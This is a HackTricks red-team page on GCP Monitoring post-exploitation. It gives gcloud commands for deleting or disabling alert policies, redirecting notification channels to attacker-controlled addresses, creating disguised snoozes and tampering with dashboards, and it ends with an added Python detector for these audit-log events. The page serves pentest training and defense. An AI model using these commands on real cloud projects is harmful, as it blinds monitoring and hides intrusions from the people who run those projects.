hacktricks-cloud/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md
2024-12-12 19:35:48 +01:00

GCP - Monitoring Post Exploitation

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Monitoring

For more information check:

{% content-ref url="../gcp-services/gcp-monitoring-enum.md" %} gcp-monitoring-enum.md {% endcontent-ref %}

For other ways to disrupt logs check:

{% content-ref url="gcp-logging-post-exploitation.md" %} gcp-logging-post-exploitation.md {% endcontent-ref %}

monitoring.alertPolicies.delete

Delete an alert policy:

```bash
gcloud alpha monitoring policies delete <policy>
```

monitoring.alertPolicies.update

Disrupt an alert policy:

```bash
# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled

# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels

# Change notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>
```

monitoring.dashboards.update

Modify a dashboard to disrupt it:

```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
  displayName: New Dashboard with New Display Name
  etag: 40d1040034db4e5a9dee931ec1b12c0d
  gridLayout:
    widgets:
    - text:
        content: Hello World
  '''
```

monitoring.dashboards.delete

Delete a dashboard:

```bash
# Delete dashboard
gcloud monitoring dashboards delete <dashboard>
```

monitoring.snoozes.create

Prevent policies from generating alerts by creating a snooze:

{% code overflow="wrap" %}

```bash
# Stop alerts by creating a snooze
gcloud monitoring snoozes create --display-name="Maintenance Week" \
    --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
    --start-time="2023-03-01T03:00:00.0-0500" \
    --end-time="2023-03-07T23:59:59.5-0500"
```

{% endcode %}

monitoring.snoozes.update

Update the timing of a snooze so that no alerts are created during the window the attacker is interested in:

{% code overflow="wrap" %}

```bash
# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME

# Modify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
```

{% endcode %}

monitoring.notificationChannels.delete

Delete a configured channel:

```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>
```

monitoring.notificationChannels.update

Update labels of a channel to disrupt it:

{% code overflow="wrap" %}

```bash
# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
```

{% endcode %}
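
The calls above are Monitoring API configuration writes, which Cloud Audit Logs records as Admin Activity entries. The following added example (not part of the original page) triages exported audit entries, one JSON object per line, for those calls. The allow-listed service account, the sample entries and the function names are assumptions constructed for illustration.

```python
import json

# methodName suffixes that Cloud Audit Logs records for the Monitoring API
# calls gated by the permissions listed on this page.
WATCHED = {
    "AlertPolicyService.DeleteAlertPolicy": "alert policy deleted",
    "AlertPolicyService.UpdateAlertPolicy": "alert policy modified",
    "NotificationChannelService.DeleteNotificationChannel": "channel deleted",
    "NotificationChannelService.UpdateNotificationChannel": "channel modified",
    "SnoozeService.CreateSnooze": "snooze created",
    "SnoozeService.UpdateSnooze": "snooze modified",
    "DashboardsService.UpdateDashboard": "dashboard modified",
    "DashboardsService.DeleteDashboard": "dashboard deleted",
}
# Assumption: identity expected to change monitoring config (hypothetical).
CI = "monitoring-ci@my-project.iam.gserviceaccount.com"
APPROVED = {CI}

def triage(log_lines):
    findings = []
    for line in log_lines:
        payload = json.loads(line).get("protoPayload", {})
        if payload.get("serviceName") != "monitoring.googleapis.com":
            continue
        # Keep "<Service>.<Method>" so v3 and dashboard.v1 prefixes both match.
        short = ".".join(payload.get("methodName", "").split(".")[-2:])
        if short not in WATCHED:
            continue
        who = payload.get("authenticationInfo", {}).get("principalEmail", "unknown")
        findings.append({"what": WATCHED[short], "principal": who,
                         "resource": payload.get("resourceName"),
                         "severity": "low" if who in APPROVED else "high"})
    return findings

def entry(method, who, resource):  # builds one constructed sample log line
    return json.dumps({"protoPayload": {
        "serviceName": "monitoring.googleapis.com", "methodName": method,
        "resourceName": resource, "authenticationInfo": {"principalEmail": who}}})

V3 = "google.monitoring.v3."
SAMPLE = [  # constructed entries, not real logs
    entry(V3 + "AlertPolicyService.UpdateAlertPolicy", "dev@example.com",
          "projects/my-project/alertPolicies/12345"),
    entry(V3 + "SnoozeService.CreateSnooze", CI, "projects/my-project/snoozes/1"),
    entry(V3 + "AlertPolicyService.ListAlertPolicies", "dev@example.com",
          "projects/my-project"),
]

for f in triage(SAMPLE): print(f)
```

Changes by identities outside the allow-list are rated high; read-only calls such as the list request in the sample are ignored.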
